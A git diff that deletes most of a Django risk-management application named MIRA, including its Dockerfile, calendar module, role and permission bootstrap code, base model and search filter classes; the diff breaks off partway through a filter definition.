diff --git a/Dockerfile b/Dockerfile deleted file mode 100644 index fac7042..0000000 --- a/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -# syntax=docker/dockerfile:1 -# Based on https://docs.docker.com/samples/django/ - -FROM python:3.11 -ENV PYTHONUNBUFFERED 1 -ENV PYTHONDONTWRITEBYTECODE=1 - -WORKDIR /code -COPY requirements.txt /code/ -RUN pip install --upgrade pip -RUN pip install -r requirements.txt -RUN apt update && \ - apt install -y gettext && \ - apt install -y locales - -COPY mira /code/mira -COPY cal /code/cal -COPY core /code/core -COPY db/readme.txt /code/db/readme.txt -COPY iam /code/iam -COPY library /code/library -COPY locale /code/locale -COPY serdes /code/serdes -COPY static /code/static -COPY theme /code/theme -COPY manage.py startup.sh /code/ - -RUN django-admin makemessages --all -i venv && \ - django-admin compilemessages -i venv - -RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen \ - && sed -i -e 's/# fr_FR.UTF-8 UTF-8/fr_FR.UTF-8 UTF-8/' /etc/locale.gen \ - && locale-gen - -ENTRYPOINT ["bash", "startup.sh"] -EXPOSE 8000 diff --git a/cal/__init__.py b/cal/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/cal/admin.py b/cal/admin.py deleted file mode 100644 index 846f6b4..0000000 --- a/cal/admin.py +++ /dev/null @@ -1 +0,0 @@ -# Register your models here. diff --git a/cal/apps.py b/cal/apps.py deleted file mode 100644 index 7bd61ed..0000000 --- a/cal/apps.py +++ /dev/null @@ -1,6 +0,0 @@ -from django.apps import AppConfig - - -class CalConfig(AppConfig): - default_auto_field = 'django.db.models.BigAutoField' - name = 'cal' diff --git a/cal/forms.py b/cal/forms.py deleted file mode 100644 index 7e55852..0000000 --- a/cal/forms.py +++ /dev/null @@ -1,18 +0,0 @@ -from django.forms import ModelForm, DateInput -from cal.models import Event - -class EventForm(ModelForm): - class Meta: - model = Event - # datetime-local is a HTML5 input type, format to make date time show on fields - widgets = { - 'start_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'), - 'end_time': DateInput(attrs={'type': 'datetime-local'}, format='%Y-%m-%dT%H:%M'), - } - fields = '__all__' - - def __init__(self, *args, **kwargs): - super(EventForm, self).__init__(*args, **kwargs) - # input_formats parses HTML5 datetime-local input to datetime field - self.fields['start_time'].input_formats = ('%Y-%m-%dT%H:%M',) - self.fields['end_time'].input_formats = ('%Y-%m-%dT%H:%M',) \ No newline at end of file diff --git a/cal/migrations/0001_initial.py b/cal/migrations/0001_initial.py deleted file mode 100644 index 1fe0338..0000000 --- a/cal/migrations/0001_initial.py +++ /dev/null @@ -1,24 +0,0 @@ -# Generated by Django 4.2 on 2023-05-03 08:03 - -from django.db import migrations, models - - -class Migration(migrations.Migration): - - initial = True - - dependencies = [ - ] - - operations = [ - migrations.CreateModel( - name='Event', - fields=[ - ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('name', models.CharField(max_length=200)), - ('description', models.TextField()), - ('start_time', models.DateTimeField()), - ('end_time', models.DateTimeField()), - ], - ), - ] diff --git a/cal/migrations/__init__.py b/cal/migrations/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/cal/models.py b/cal/models.py deleted file mode 100644 index ca28e31..0000000 --- a/cal/models.py +++ /dev/null @@ -1,15 +0,0 @@ -from django.db import models -from django.utils.html import format_html -from django.urls import reverse - - -class Event(models.Model): - name = models.CharField(max_length=200) - description = models.TextField() - start_time = models.DateTimeField() - end_time = models.DateTimeField() - - @property - def get_html_url(self): - url = "" - return format_html(' {} ', url, self.name) \ No newline at end of file diff --git a/cal/tests/__init__.py b/cal/tests/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/cal/tests/test_models.py b/cal/tests/test_models.py deleted file mode 100644 index b307048..0000000 --- a/cal/tests/test_models.py +++ /dev/null @@ -1,8 +0,0 @@ -from cal.models import * -import pytest - -@pytest.mark.django_db -def test_event(): - Event.objects.create(name="Event", description="A simple event", start_time="2022-1-20", end_time="2022-1-27") - event = Event.objects.get(name="Event") - diff --git a/cal/tests/test_utils.py b/cal/tests/test_utils.py deleted file mode 100644 index 6f4ca72..0000000 --- a/cal/tests/test_utils.py +++ /dev/null @@ -1,25 +0,0 @@ -from cal.models import * -from cal.utils import * -from calendar import LocaleHTMLCalendar -from core.models import SecurityMeasure, RiskAcceptance -import pytest - -""" -class test_Calendar(LocaleHTMLCalendar): - def __init__(self, year=None, month=None, *args, **kwargs): - self.year = year - self.month = month - super(Calendar, self).__init__(*args, **kwargs) - -@pytest.mark.django_db -def test_formatday(): - Event.objects.create(title="Event", description="A simple event", start_time="2022-1-20", end_time="2022-1-27") - Event.objects.create(title="SecondEvent", description="A second event", start_time="2022-1-20", end_time="2022-1-27") - calendar = Calendar(LocaleHTMLCalendar) - list = { - "mtg":Event.objects.get(title="Event"), - "ra":Event.objects.get(title="SecondEvent") - } - day = '2022-1-24' - print(Calendar.formatday(calendar, day, list)) -""" diff --git a/cal/tests/test_views.py b/cal/tests/test_views.py deleted file mode 100644 index 312a7bc..0000000 --- a/cal/tests/test_views.py +++ /dev/null @@ -1,19 +0,0 @@ -from datetime import date, datetime -from cal.models import * -from cal.views import * -import pytest - - -# Create your tests here. -def test_next_month(): - d = date(2021, 11, 23) - assert next_month(d) == 'month=2021-12' - -def test_pre_month(): - d = date(2021, 11, 23) - assert prev_month(d) == 'month=2021-10' - -def test_get_date(): - d = date(2021, 11, 1) - assert get_date("2021-11") == d - assert get_date(False).strftime('%Y-%m-%d-%H:%M:%S') == datetime.today().strftime('%Y-%m-%d-%H:%M:%S') diff --git a/cal/utils.py b/cal/utils.py deleted file mode 100644 index 5aa7e82..0000000 --- a/cal/utils.py +++ /dev/null @@ -1,46 +0,0 @@ -from datetime import datetime, timedelta -from calendar import HTMLCalendar, LocaleHTMLCalendar -from .models import Event -from core.models import SecurityMeasure, RiskAcceptance -from django.utils.html import format_html - -class Calendar(LocaleHTMLCalendar): - def __init__(self, year=None, month=None, *args, **kwargs): - self.year = year - self.month = month - super(Calendar, self).__init__(*args, **kwargs) - - # formats a day as a td - # filter events by day - def formatday(self, day, events): - events_per_day = list(events['mtg'].filter(eta__day=day)) - events_per_day += list(events['ra'].filter(expiry_date__day=day)) - d = '' - for event in events_per_day: - d += format_html('
  • {}
  • ', event.get_html_url) - - if day != 0: - return f"{day}" - return '' - - # formats a week as a tr - def formatweek(self, theweek, events): - week = '' - for d, weekday in theweek: - week += self.formatday(d, events) - return f' {week} ' - - # formats a month as a table - # filter events by year and month - def formatmonth(self, withyear=True): - events = {'mtg': SecurityMeasure.objects.filter(eta__year=self.year, eta__month=self.month), - 'ra': RiskAcceptance.objects.filter(expiry_date__year=self.year, expiry_date__month=self.month)} - - cal = f'\n' - cal += f'{self.formatmonthname(self.year, self.month, withyear=withyear).upper()}\n' - - cal += f'{self.formatweekheader()}\n' - for week in self.monthdays2calendar(self.year, self.month): - cal += f'{self.formatweek(week, events)}\n' - - return cal diff --git a/cal/views.py b/cal/views.py deleted file mode 100644 index 1cae0b2..0000000 --- a/cal/views.py +++ /dev/null @@ -1,63 +0,0 @@ -from datetime import datetime, timedelta, date -from django.shortcuts import render, get_object_or_404 -from django.http import HttpResponse, HttpResponseRedirect, request -from django.views import generic -from django.urls import reverse -from django.utils.html import format_html -from django.utils.translation import get_language -import calendar - -from .models import * -from iam.models import RoleAssignment -from .utils import Calendar -from .forms import EventForm -from core.models import SecurityMeasure -from core.views import BaseContextMixin - - -def index(request): - return HttpResponse('hello') - - -class CalendarView(BaseContextMixin, generic.ListView): - model = SecurityMeasure - template_name = 'core/calendar.html' - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - d = get_date(self.request.GET.get('month', None)) - - # TODO: implement a more elegant security_function - cal_lang = get_language() - cal_country = 'US' if (cal_lang == 'en') else cal_lang.split('-')[0].upper() - cal_locale = cal_lang + '_' + cal_country + '.UTF-8' - - cal = Calendar(d.year, d.month, calendar.MONDAY, cal_locale) - html_cal = cal.formatmonth(withyear=True) - context['calendar'] = format_html(html_cal) - context['prev_month'] = prev_month(d) - context['next_month'] = next_month(d) - # print('Calendar Locale: '+ cal_locale ) # DEBUG - return context - - -def get_date(req_month): - if req_month: - year, month = (int(x) for x in req_month.split('-')) - return date(year, month, day=1) - return datetime.today() - - -def prev_month(d): - first = d.replace(day=1) - prev_month = first - timedelta(days=1) - month = 'month=' + str(prev_month.year) + '-' + str(prev_month.month) - return month - - -def next_month(d): - days_in_month = calendar.monthrange(d.year, d.month)[1] - last = d.replace(day=days_in_month) - next_month = last + timedelta(days=1) - month = 'month=' + str(next_month.year) + '-' + str(next_month.month) - return month diff --git a/core/__init__.py b/core/__init__.py deleted file mode 100644 index be9d237..0000000 --- a/core/__init__.py +++ /dev/null @@ -1 +0,0 @@ -default_app_config = 'core.apps.CoreConfig' \ No newline at end of file diff --git a/core/admin_config.py b/core/admin_config.py deleted file mode 100644 index 92705ef..0000000 --- a/core/admin_config.py +++ /dev/null @@ -1,12 +0,0 @@ -# -*- coding: utf-8 -*- -from django.utils.translation import gettext_lazy as _ - -config = { - 'SITE_TITLE': 'MIRA', - 'INDEX_TITLE': _('Editor'), - 'MENU_TITLE': _('Menu'), -} - -def get_config(key): - value = config.get(key, None) - return value diff --git a/core/apps.py b/core/apps.py deleted file mode 100644 index fd7730d..0000000 --- a/core/apps.py +++ /dev/null @@ -1,247 +0,0 @@ -from django.apps import AppConfig -from django.utils.translation import gettext_lazy as _ - - -def startup(): - """Implement Mira 1.0 default Roles and User Groups""" - """Only called in main, not during makemigrations or migrate""" - import os - if os.environ.get('RUN_MAIN'): - from .models import Folder - from iam.models import UserGroup, Role, RoleAssignment - from django.contrib.auth.models import Permission - from iam.models import User - from mira.settings import MIRA_SUPERUSER_EMAIL, MIRA_SUPERUSER_PASSWORD - - auditor_permissions = Permission.objects.filter(codename__in=[ - "view_project", - "view_analysis", - "view_securitymeasure", - "view_riskscenario", - "view_riskacceptance", - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "view_usergroup", - "view_riskmatrix" - ]) - - validator_permissions = Permission.objects.filter(codename__in=[ - "view_project", - "view_analysis", - "view_securitymeasure", - "view_riskscenario", - "view_riskacceptance", - "validate_riskacceptance", - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "view_usergroup", - "view_riskmatrix" - ]) - - analyst_permissions = Permission.objects.filter(codename__in=[ - "add_project", - "view_project", - "change_project", - "delete_project", - - "add_analysis", - "view_analysis", - "change_analysis", - "delete_analysis" - - "add_securitymeasure", - "view_securitymeasure", - "change_securitymeasure", - "delete_securitymeasure", - - "add_riskscenario", - "view_riskscenario", - "change_riskscenario", - "delete_riskscenario", - - "add_riskacceptance", - "view_riskacceptance", - "change_riskacceptance", - "delete_riskacceptance", - - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "view_usergroup", - "view_riskmatrix", - ]) - - domain_manager_permissions = Permission.objects.filter(codename__in=[ - "change_usergroup", - "view_usergroup", - - "add_project", - "change_project", - "delete_project", - "view_project", - - "add_analysis", - "view_analysis", - "change_analysis", - "delete_analysis", - - "add_securitymeasure", - "view_securitymeasure", - "change_securitymeasure", - "delete_securitymeasure", - - "add_riskscenario", - "view_riskscenario", - "change_riskscenario", - "delete_riskscenario", - - "add_riskacceptance", - "view_riskacceptance", - "change_riskacceptance", - "delete_riskacceptance", - - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "change_folder", - - "add_riskmatrix", - "view_riskmatrix", - "change_riskmatrix", - "delete_riskmatrix", - ]) - - administrator_permissions = Permission.objects.filter(codename__in=[ - "add_user", - "view_user", - "change_user", - "delete_user", - - "add_usergroup", - "view_usergroup", - "change_usergroup", - "delete_usergroup", - - "add_event", - "view_event", - "change_event", - "delete_event", - - "add_asset", - "view_asset", - "change_asset", - "delete_asset", - - "add_threat", - "view_threat", - "change_threat", - "delete_threat", - - "add_securityfunction", - "view_securityfunction", - "change_securityfunction", - "delete_securityfunction", - - "add_folder", - "change_folder", - "view_folder", - "delete_folder", - - "add_project", - "change_project", - "delete_project", - "view_project", - - "add_analysis", - "view_analysis", - "change_analysis", - "delete_analysis", - - "add_securitymeasure", - "view_securitymeasure", - "change_securitymeasure", - "delete_securitymeasure", - - "add_riskscenario", - "view_riskscenario", - "change_riskscenario", - "delete_riskscenario", - - "add_riskacceptance", - "view_riskacceptance", - "change_riskacceptance", - "delete_riskacceptance", - "validate_riskacceptance", - - "add_riskmatrix", - "view_riskmatrix", - "change_riskmatrix", - "delete_riskmatrix", - - "backup", - "restore" - ]) - - # if superuser defined and does not exist, then create it - if MIRA_SUPERUSER_EMAIL and not User.objects.filter(email=MIRA_SUPERUSER_EMAIL).exists(): - User.objects.create_superuser(email=MIRA_SUPERUSER_EMAIL, password=MIRA_SUPERUSER_PASSWORD, is_superuser=True) - # if root folder does not exist, then create it - if not Folder.objects.filter(content_type=Folder.ContentType.ROOT).exists(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - auditor = Role.objects.create(name="BI-RL-AUD", builtin=True) - auditor.permissions.set(auditor_permissions) - validator = Role.objects.create(name="BI-RL-VAL", builtin=True) - validator.permissions.set(validator_permissions) - analyst = Role.objects.create(name="BI-RL-ANA", builtin=True) - analyst.permissions.set(analyst_permissions) - domain_manager = Role.objects.create( - name="BI-RL-DMA", builtin=True) - domain_manager.permissions.set(domain_manager_permissions) - administrator = Role.objects.create(name="BI-RL-ADM", builtin=True) - administrator.permissions.set(administrator_permissions) - # if global administrators user group does not exist, then create it - if not UserGroup.objects.filter(name="BI-UG-ADM", folder=Folder.get_root_folder()).exists(): - administrators = UserGroup.objects.create( - name="BI-UG-ADM", folder=Folder.get_root_folder(), builtin=True) - ra1 = RoleAssignment.objects.create( - user_group=administrators, role=Role.objects.get(name="BI-RL-ADM"), is_recursive=True, builtin=True, - folder=Folder.get_root_folder()) - ra1.perimeter_folders.add(administrators.folder) - # if global auditors user group does not exist, then create it - if not UserGroup.objects.filter(name="BI-UG-GAD", folder=Folder.get_root_folder()).exists(): - global_auditors = UserGroup.objects.create(name="BI-UG-GAD", folder=Folder.objects.get( - content_type=Folder.ContentType.ROOT), builtin=True) - ra2 = RoleAssignment.objects.create(user_group=global_auditors, role=Role.objects.get( - name="BI-RL-AUD"), is_recursive=True, builtin=True, - folder=Folder.get_root_folder()) - ra2.perimeter_folders.add(global_auditors.folder) - # if global validators user group does not exist, then create it - if not UserGroup.objects.filter(name="BI-UG-GVA", folder=Folder.get_root_folder()).exists(): - global_validators = UserGroup.objects.create(name="BI-UG-GVA", folder=Folder.objects.get( - content_type=Folder.ContentType.ROOT), builtin=True) - ra2 = RoleAssignment.objects.create(user_group=global_validators, role=Role.objects.get( - name="BI-RL-VAL"), is_recursive=True, builtin=True, - folder=Folder.get_root_folder()) - ra2.perimeter_folders.add(global_validators.folder) - # add any superuser to the global administrors group, in case it is not yet done - for superuser in User.objects.filter(is_superuser=True): - UserGroup.objects.get(name="BI-UG-ADM").user_set.add(superuser) - # fix administrator role, to facilitate migrations - administrator = Role.objects.filter(name="BI-RL-ADM").first() - administrator.permissions.set(administrator_permissions) - - -class CoreConfig(AppConfig): - default_auto_field = 'django.db.models.BigAutoField' - name = 'core' - verbose_name = _("Core") - - def ready(self): - startup() diff --git a/core/base_models.py b/core/base_models.py deleted file mode 100644 index 93d8b31..0000000 --- a/core/base_models.py +++ /dev/null @@ -1,86 +0,0 @@ -from django.db import models -from django.utils.translation import gettext_lazy as _ -from django.urls.base import reverse_lazy -from django.core.exceptions import ValidationError -import uuid - -class AbstractBaseModel(models.Model): - id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) - name = models.CharField(max_length=200, verbose_name=_('Name'), unique=False) - description = models.TextField(verbose_name=_('Description'), blank=True, null=True) - created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at')) - - class Meta: - abstract = True - ordering = ['name'] - - def scoped_id(self, scope: models.QuerySet) -> int: - """ - Returns the ID of the object in the given scope. - - Args: - scope: the scope in which to run the check - - Returns: - The ID of the object in the given scope - """ - if self.pk: - scope = scope.exclude(pk=self.pk) - return scope.filter(created_at__lt=self.created_at).count() + 1 - - def __str__(self) -> str: - return self.name - - def is_unique_in_scope(self, scope: models.QuerySet, fields_to_check: list) -> bool: - """ - Checks if the object is unique in the given scope based on the given fields. - - Args: - scope: the scope in which to run the check - fields_to_check: the fields to check for uniqueness - - Returns: - True if the object is unique in the given scope, False otherwise - """ - # if the object already exists (i.e. has a primary key), exclude it from the scope - # to avoid false positives as a result of the object being compared to itself - if self.pk: - scope = scope.exclude(pk=self.pk) - return not scope.filter(**{f"{field}__iexact": getattr(self, field) for field in fields_to_check if hasattr(self, field)}).exists() - - def display_path(self): - pass - - def display_name(self): - pass - - @property - def edit_url(self): - return reverse_lazy(f"{self.__class__.__name__.lower()}-update", kwargs={"pk": self.pk}) - - def get_scope(self): - if hasattr(self, 'risk_scenario') and self.risk_scenario is not None: - return self.__class__.objects.filter(risk_scenario=self.risk_scenario) - if hasattr(self, 'analysis') and self.analysis is not None: - return self.__class__.objects.filter(analysis=self.analysis) - if hasattr(self, 'project') and self.project is not None: - return self.__class__.objects.filter(project=self.project) - if hasattr(self, 'folder') and self.folder is not None: - return self.__class__.objects.filter(folder=self.folder) - if hasattr(self, 'parent_folder') and self.parent_folder is not None: - return self.__class__.objects.filter(parent_folder=self.parent_folder) - return self.__class__.objects.all() - - def clean(self) -> None: - scope = self.get_scope() - field_errors = {} - _fields_to_check = self.fields_to_check if hasattr(self, 'fields_to_check') else ['name'] - if not self.is_unique_in_scope(scope=scope, fields_to_check=_fields_to_check): - field_errors['name'] = _('This name is already in use.') - super().clean() - if field_errors: - raise ValidationError(field_errors) - - def save(self, *args, **kwargs) -> None: - self.clean() - super().save(*args, **kwargs) \ No newline at end of file diff --git a/core/filters.py b/core/filters.py deleted file mode 100644 index eb6b455..0000000 --- a/core/filters.py +++ /dev/null @@ -1,501 +0,0 @@ -from django.forms import CharField, CheckboxInput, ChoiceField, DateInput, DateTimeInput, EmailInput, HiddenInput, ModelForm, NullBooleanSelect, NumberInput, PasswordInput, Select, SelectMultiple, CheckboxSelectMultiple, TextInput, Textarea, TimeInput, URLInput, widgets -from django_filters import FilterSet, OrderingFilter, ModelMultipleChoiceFilter, MultipleChoiceFilter, CharFilter, ChoiceFilter -# from django_filters.widgets import * -from django.db.models import Q - -from core.models import Analysis, RiskScenario, SecurityMeasure, SecurityFunction, RiskAcceptance, RiskMatrix -from core.models import Asset, Folder, Project, Threat, SecurityFunction -from core.forms import SearchableSelect, SearchableCheckboxSelectMultiple -from iam.models import User, UserGroup, RoleAssignment -from django.utils.translation import gettext_lazy as _ - - -class GenericFilterSet(FilterSet): - def __init__(self, data=None, queryset=None, *, request=None, prefix=None): - super().__init__(data, queryset, request=request, prefix=prefix) - # for f in self.filters.items(): - # print(f[0], f[1].field.widget) - - -class GenericOrderingFilter(OrderingFilter): - def __init__(self, *args, empty_label=_("Order by"), **kwargs): - super().__init__(self, *args, empty_label=_("Order by"), widget=Select, **kwargs) - self.field.widget.attrs = { - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'onchange': 'this.form.submit();' - } - - -class GenericModelMultipleChoiceFilter(ModelMultipleChoiceFilter): - widget = SearchableCheckboxSelectMultiple( - attrs={ - 'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 overflow-y-scroll max-h-72' - } - ) - - def __init__(self, *args, widget=widget, **kwargs): - super().__init__(*args, widget=widget, **kwargs) - - -class GenericMultipleChoiceFilter(MultipleChoiceFilter): - widget = SearchableCheckboxSelectMultiple( - attrs={ - 'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 overflow-y-scroll max-h-72' - } - ) - - def __init__(self, *args, widget=widget, **kwargs): - super().__init__(*args, widget=widget, **kwargs) - - -class GenericCharFilter(CharFilter): - widget = TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0' - } - ) - def __init__(self, field_name=None, lookup_expr='icontains', *, label=None, method=None, - distinct=False, exclude=False, widget=widget, search_term=None, **kwargs): - super().__init__(field_name, lookup_expr='icontains', label=label, method=method, - distinct=distinct, exclude=exclude, widget=widget, **kwargs) - placeholder = f"Search {search_term if search_term else ''}..." - self.widget.attrs['placeholder'] = placeholder - - -class GenericChoiceFilter(ChoiceFilter): - widget = SearchableSelect( - attrs={ - 'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll' - } - ) - - def __init__(self, *args, widget=widget, **kwargs): - super().__init__(*args, widget=widget, **kwargs) - - -def viewable_folders(request): - if request is None: - return Folder.objects.none() - accessible_folders = RoleAssignment.get_accessible_folders( - Folder.get_root_folder(), request.user, Folder.ContentType.DOMAIN - ) - return Folder.objects.filter(id__in=accessible_folders) - - -class AnalysisFilter(GenericFilterSet): - orderby = GenericOrderingFilter( - fields=( - ('is_draft', 'is_draft'), - ('project', 'project'), - ('auditor', 'auditor'), - ('updated_at', 'updated_at'), - ), - field_labels={ - 'is_draft': _('draft'.capitalize()), - '-is_draft': _('Draft (descending)'), - 'project': _('project'.capitalize()), - '-project': _('Project (descending)'), - 'auditor': _('auditor'.capitalize()), - '-auditor': _('Auditor (descending)'), - 'updated_at': _('updated at'.capitalize()), - '-updated_at': _('Updated at (descending)') - } - ) - - STATUS_CHOICES = ( - (True, _('Yes')), - (False, _('No')), - ) - - project__name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search analysis...') - } - )) - is_draft = GenericChoiceFilter(choices=STATUS_CHOICES, widget=Select( - attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50' - } - )) - auditor = GenericModelMultipleChoiceFilter(queryset=User.objects.filter( - analysis__auditor__isnull=False).distinct(), label=('Auditor')) - - project__folder = GenericModelMultipleChoiceFilter( - queryset=viewable_folders, label=_('Domain')) - - project = GenericModelMultipleChoiceFilter(queryset=Project.objects.all()) - - class Meta: - model = Analysis - fields = ['is_draft', 'auditor', 'project'] - - -class RiskScenarioFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search scenario...') - } - )) - threat = GenericModelMultipleChoiceFilter(queryset=Threat.objects.all()) - analysis__project = GenericModelMultipleChoiceFilter( - queryset=Project.objects.all(), label=_('Project')) - analysis__project__folder = GenericModelMultipleChoiceFilter( - queryset=viewable_folders, label=_('Domain')) - treatment = GenericMultipleChoiceFilter( - choices=RiskScenario.TREATMENT_OPTIONS) - - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('threat', 'threat'), - ('analysis__project', 'analysis__project'), - ('treatment', 'treatment'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'threat': _('threat'.capitalize()), - '-threat': _('Threat (descending)'), - 'analysis__project': _('Project'), - '-analysis__project': _('Project (descending)'), - 'treatment': _('treatment'.capitalize()), - '-treatment': _('Treatment (descending)'), - } - ) - - class Meta: - model = RiskScenario - fields = ['name', 'threat', 'analysis__project', 'treatment'] - - -class SecurityMeasureFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search security measure...') - } - )) - folder = GenericModelMultipleChoiceFilter(queryset=viewable_folders) - type = GenericMultipleChoiceFilter(choices=SecurityMeasure.MITIGATION_TYPE) - status = GenericMultipleChoiceFilter( - choices=SecurityMeasure.MITIGATION_STATUS) - security_function = GenericModelMultipleChoiceFilter( - queryset=SecurityFunction.objects.all()) - - orderby = GenericOrderingFilter( - fields=( - ('status', 'status'), - ('name', 'name'), - ('type', 'type'), - ('folder', 'folder'), - ('security_function', 'security_function'), - ), - field_labels={ - 'status': _('status'.capitalize()), - '-status': _('Status (descending)'), - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'type': _('type'.capitalize()), - '-type': _('Type (descending)'), - 'folder': _('Domain'), - '-folder': _('Domain (descending)'), - 'security_function': _('security function'.capitalize()), - '-security_function': _('Security function (descending)'), - } - ) - - class Meta: - model = SecurityMeasure - fields = ['name', 'type', - 'folder', 'security_function'] - - -class RiskAcceptanceFilter(GenericFilterSet): - search = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search acceptance...') - } - ), method='acceptance_search') - risk_scenarios = GenericModelMultipleChoiceFilter( - queryset=RiskScenario.objects.filter(analysis__project__folder__content_type=Folder.ContentType.DOMAIN)) - folder = GenericModelMultipleChoiceFilter(queryset=viewable_folders) - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('risk_scenarios', 'risk_scenarios'), - ('expiry_date', 'expiry_date'), - ('validator', 'validator'), - ('folder', 'folder'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'risk_scenarios': _('risk scenarios'.capitalize()), - '-risk_scenarios': _('Risk scenarios (descending)'), - 'expiry_date': _('expiry'.capitalize() + ' date'), - '-expiry_date': _('Expiry date (descending)'), - 'validator': _('validator'.capitalize()), - '-validator': _('Validator (descending)'), - 'folder': _('Domain'.capitalize()), - '-folder': _('Domain (descending)'), - } - ) - - class Meta: - model = RiskAcceptance - fields = ['risk_scenarios', 'folder'] - - def acceptance_search(self, queryset, name, search_query): - return queryset.filter( - Q(name__icontains=search_query) | Q( - risk_scenarios__name__icontains=search_query) - ).distinct() - - -class ProjectsDomainFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search domain...') - } - )) - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('description', 'description'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'description': _('description'.capitalize()), - '-description': _('Description (descending)'), - } - ) - - class Meta: - model = Folder - fields = ['name', 'description'] - - -class RiskMatrixFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search matrices...') - } - )) - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('description', 'description'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'description': _('description'.capitalize()), - '-description': _('Description (descending)'), - } - ) - - class Meta: - model = RiskMatrix - fields = ['name', 'description'] - - -class ProjectFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search project...') - } - )) - folder = GenericModelMultipleChoiceFilter(queryset=viewable_folders) - lc_status = GenericMultipleChoiceFilter(choices=Project.PRJ_LC_STATUS) - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('lc_status', 'lc_status'), - ('folder', 'folder'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'lc_status': _('status'.capitalize()), - '-lc_status': _('Status (descending)'), - 'folder': _('Domain'), - '-folder': _('Domain (descending)'), - } - ) - - class Meta: - model = Project - fields = '__all__' - exclude = ['created_at'] - - -class ThreatFilter(GenericFilterSet): - PROVIDER_CHOICES = Threat.objects.exclude(provider__isnull=True).values_list('provider', 'provider').distinct() - - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search threat...') - } - )) - provider = GenericMultipleChoiceFilter(choices=PROVIDER_CHOICES, null_label=_('None')) - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('provider', 'provider'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'provider': _('provider'.capitalize()), - '-provider': _('Provider (descending)'), - } - ) - - class Meta: - model = Threat - fields = ['provider'] - - -class SecurityFunctionFilter(GenericFilterSet): - PROVIDER_CHOICES = SecurityFunction.objects.exclude( - provider__isnull=True).values_list('provider', 'provider').distinct() - - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search function...') - } - )) - provider = GenericMultipleChoiceFilter( - choices=PROVIDER_CHOICES, null_label='--') - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ('provider', 'provider'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - 'provider': _('provider'.capitalize()), - '-provider': _('Provider (descending)'), - } - ) - - class Meta: - model = SecurityFunction - fields = ['provider'] - - -class AssetFilter(GenericFilterSet): - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search asset...') - } - )) - orderby = GenericOrderingFilter( - fields=( - ('name', 